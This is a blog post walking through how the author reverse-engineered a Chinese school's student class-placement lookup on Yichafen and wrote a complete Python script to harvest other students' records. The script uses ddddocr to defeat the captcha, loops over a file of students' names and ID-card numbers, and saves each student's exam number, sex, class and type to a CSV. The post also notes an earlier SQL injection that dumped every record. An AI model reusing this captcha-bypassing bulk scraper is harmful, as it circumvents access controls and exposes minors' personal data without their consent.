Scraping the 2024 Tengzhou No. 2 High School New Freshman Class Placement Data from Yichafen

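Tengzhou No. 2 High School has opened this year's class placement lookup. I had assumed it would be the same system as last year, the one with an injection vulnerability where appending a single ' was enough to dump every record. This year, though, they switched to Yichafen, so I had no choice but to give that a try.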

Analysis

Opening the link brings up the dreaded blue-and-white UI.

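I tried all sorts of tricks for quite a while but could not switch back to the old desktop UI. I wanted it because, as far as I remember, the desktop UI of older Yichafen versions could be used to bypass the captcha.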

Capture the traffic with Burp Suite (bp) to see how it works.

After clicking OK, the browser sends a POST request containing the entered name (URL-encoded) and the last six digits of the ID card number.
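As a small illustration of what a form-encoded body of this kind looks like, the sketch below uses Python's standard urllib.parse module. The field names are the ones used in the script later in this post; the name and digits are made-up placeholders, not real data.

```python
from urllib.parse import urlencode, parse_qs

# Placeholder values for illustration only (not real data).
form = {
    "s_xingming": "张三",                  # name field, as used in the script later in this post
    "s_shenfenzhenghouliuwei": "123456",   # last six digits of the ID card number
}

# urlencode percent-encodes non-ASCII characters as their UTF-8 bytes.
body = urlencode(form)
print(body)

# parse_qs reverses the encoding, which helps when reading a captured request.
decoded = parse_qs(body)
print(decoded["s_xingming"][0])
```

Each Chinese character becomes three percent-encoded bytes, which is why the name looks unreadable in the captured request.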

Forward it and look at the response.

After decoding the Unicode escapes, the JSON part reads as follows (查询成功 means "query succeeded"):
{"info":"查询成功","status":1,"url":"\/public\/queryresult\/from_device\/mobile.html"}

Keep forwarding, and a new request shows up.

The address requested here is exactly the url from the JSON in the previous response.

Then look at the response.
Good, the data is already there.

The overall query flow is now mostly clear, so the next step is to modify the request myself to fetch other students' data.

Forging requests

While replaying the request many times, I suddenly got a Cookie error. Capturing the traffic again showed that a captcha was now required:
{"info":"\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e","status":0,"errNo":100,"showCountdown":true,"showPicVerify":true}
After decoding (验证码不正确 means "incorrect captcha"): {"info":"验证码不正确","status":0,"errNo":100,"showCountdown":true,"showPicVerify":true}
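The \uXXXX sequences are ordinary JSON string escapes rather than encryption, so any JSON parser decodes them. A minimal sketch with Python's standard json module, using the two response bodies quoted in this post:

```python
import json

# Raw string so that the backslash escapes reach the JSON parser unchanged.
raw = r'{"info":"\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e","status":0,"errNo":100,"showCountdown":true,"showPicVerify":true}'

reply = json.loads(raw)
print(reply["info"])

# ensure_ascii=False keeps non-ASCII characters readable when re-serializing.
print(json.dumps(reply, ensure_ascii=False))

# "\/" is also just a JSON escape for "/", so the url field decodes to a plain path.
ok = json.loads(r'{"info":"查询成功","status":1,"url":"\/public\/queryresult\/from_device\/mobile.html"}')
print(ok["url"])
```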

Refreshing the home page while capturing reveals the request that refreshes the captcha. Sent to Repeater, it can be used directly.

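Next I replayed the captcha request and added a verify parameter to the request carrying the name and ID digits, and the response went back to 'status':1.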

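The mechanism is now clearer. The user obtains a cookie. When the page loads, the browser first sends a GET request carrying that cookie to fetch the captcha. After the user clicks log in, the entered name, ID digits, and captcha are sent together to url1. Once the server behind url1 has verified the captcha, it binds the queried student's information to the PHPSESSID in the cookie. The browser then sends a GET request with the cookie to url2, and the server authenticates by the cookie and returns the student's information to the front end, which completes the query.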
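To make the session binding concrete, here is a toy in-memory model of the server side of that flow. It is only a sketch of my reading of the traffic, not Yichafen's actual implementation: the class name, the method names, the single-use captcha, and the "no match" message are all assumptions made for illustration, and the record is made-up data.

```python
import secrets


class QuerySessionStore:
    """Toy model: a verified query binds one record to the session ID."""

    def __init__(self, records):
        self._records = records   # (name, id_tail) -> record
        self._captchas = {}       # session ID -> expected captcha text
        self._bound = {}          # session ID -> record bound by a successful query

    def new_session(self):
        # Stands in for the PHPSESSID cookie value.
        return secrets.token_hex(8)

    def issue_captcha(self, sid, text):
        # Stands in for the GET request that fetches the captcha image.
        self._captchas[sid] = text

    def verify_condition(self, sid, name, id_tail, verify):
        # Stands in for the POST to url1. The captcha is single-use here (assumption).
        expected = self._captchas.pop(sid, None)
        if expected is None or verify != expected:
            return {"info": "验证码不正确", "status": 0}
        record = self._records.get((name, id_tail))
        if record is None:
            return {"info": "no match", "status": 0}  # hypothetical message
        self._bound[sid] = record
        return {"info": "查询成功", "status": 1}

    def query_result(self, sid):
        # Stands in for the GET to url2: the session ID alone selects the record.
        return self._bound.get(sid)


store = QuerySessionStore({("张三", "123456"): {"班级": "1"}})
sid = store.new_session()
store.issue_captcha(sid, "ab12")
first = store.verify_condition(sid, "张三", "123456", "zzzz")   # wrong captcha
store.issue_captcha(sid, "cd34")
second = store.verify_condition(sid, "张三", "123456", "cd34")  # correct captcha
print(first["status"], second["status"], store.query_result(sid))
```

The point of the model is that the second request carries no query parameters at all: whatever was bound to the session by the first request is what comes back.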

Writing the program

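A brief outline of how it works:
The user visits the site manually to obtain a cookie and pins it in the headers.
The program first sends a GET request with the fixed headers to fetch the captcha and saves it locally, then recognizes it with the ddddocr library. After recognition it deletes the local file and passes the recognized text as the verify parameter of request 1. Meanwhile, the program reads the records in stuinfo.txt line by line and uses the tqdm library to show a progress bar.
The program then sends the request. If the response status code is 200, it goes on to send request 2 with the fixed headers, takes the response, parses the HTML with the BeautifulSoup library, and saves the result to a CSV file.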

I'll just post the finished product here:

import requests
import ddddocr
import os
from bs4 import BeautifulSoup
import csv
from tqdm import tqdm

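def save_to_csv(data, filename='results.csv'):
    """Append one result row to the CSV file, writing the header first if the file does not exist yet."""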
    file_exists = os.path.isfile(filename)
    with open(filename, mode='a', newline='', encoding='utf-8') as file:
        writer = csv.DictWriter(file, fieldnames=['准考证号', '姓名', '性别', '班级', '类型'])
        if not file_exists:
            writer.writeheader()
        writer.writerow(data)

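def get_captcha(session, captcha_page_url, local_filename):
    """Download the captcha image, run ddddocr on it, delete the file, and return the recognized text."""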
    response = session.get(captcha_page_url, headers=common_headers)
    with open(local_filename, 'wb') as f:
        f.write(response.content)
    ocr = ddddocr.DdddOcr()
    with open(local_filename, 'rb') as f:
        captcha_text = ocr.classification(f.read())
    os.remove(local_filename)
    return captcha_text

# Read stuinfo.txt (one "name,ID number" pair per line)
with open('stuinfo.txt', 'r', encoding='utf-8') as file:
    lines = file.readlines()

common_headers = {
    'Host': '********.yichafen.com',
    'Cookie': '*************',
    'Sec-Ch-Ua': '"-Not.A/Brand";v="8", "Chromium";v="102"',
    'Dnt': '1',
    'Sec-Ch-Ua-Mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
}

session = requests.Session()

captcha_page_url = 'https://********.yichafen.com/public/verify.html'
local_filename = 'captcha.png'

headers_post = {
    'Host': '********.yichafen.com',
    'Cookie': '**************',
    'Sec-Ch-Ua': '"-Not.A/Brand";v="8", "Chromium";v="102"',
    'Dnt': '1',
    'Sec-Ch-Ua-Mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept': '*/*',
    'X-Requested-With': 'XMLHttpRequest',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Origin': 'https://********.yichafen.com',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'https://********.yichafen.com/qz/L7P1Tvwqlt?from_device=mobile',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
}

headers_get = {
    'Host': '********.yichafen.com',
    'Cookie': '********',
    'Sec-Ch-Ua': '"-Not.A/Brand";v="8", "Chromium";v="102"',
    'Sec-Ch-Ua-Mobile': '?0',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Upgrade-Insecure-Requests': '1',
    'Dnt': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Dest': 'iframe',
    'Referer': 'https://********.yichafen.com/qz/L7P1Tvwqlt?from_device=mobile',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
}

# Process the records line by line, showing a progress bar
for line in tqdm(lines, desc="Processing Students", unit="student"):
    name, id_card = line.strip().split(',')
    last_six_digits = id_card[-6:]
    captcha = get_captcha(session, captcha_page_url, local_filename)
    print(f"Recognized captcha: {captcha}")

    data = {
        's_xingming': name,
        's_shenfenzhenghouliuwei': last_six_digits,
        'verify': captcha
    }

    post_url = 'https://********.yichafen.com/public/verifycondition/sqcode/NsjcAn4mMjU3MHw5ZGNhYmNhNDhiYzliNjRkNGJjZjNjZThiZmRjY2Q3Y3xzNmFqd3p5ZAO0O0OO0O0O/from_device/mobile.html'
    post_response = requests.post(post_url, headers=headers_post, data=data)

    if post_response.status_code == 200:
        print(post_response.text)
        print(f"POST request succeeded: name: {name}, last six ID digits: {last_six_digits}")

        get_url = 'https://********.yichafen.com/public/queryresult/from_device/mobile.html'
        get_response = requests.get(get_url, headers=headers_get)

        soup = BeautifulSoup(get_response.text, 'html.parser')
        table = soup.find('table', {'class': 'table table-bordered s_table-bordered js_result_table'})
        rows = table.find_all('tr')

        data = {}
        for row in rows:
            cols = row.find_all('td')
            label = cols[0].get_text(strip=True)
            value = cols[1].get_text(strip=True)
            if label in ['准考证号', '姓名', '性别', '班级', '类型']:
                data[label] = value

        print(data)
        print("\n\n")
        save_to_csv(data)
    else:
        print(f"POST request failed: name: {name}, last six ID digits: {last_six_digits}")

Success

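The program runs correctly, but because every record needs several requests plus an OCR pass, its efficiency is disappointing: the average speed is only about 2 s per item.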

Crawlers

#Python #Yichafen #BurpSuite


http://blog.luckysix.cc/2024/08/19/爬取易查分2024滕州二中新高一分班数据/

Author

Thanatos

Published

August 19, 2024

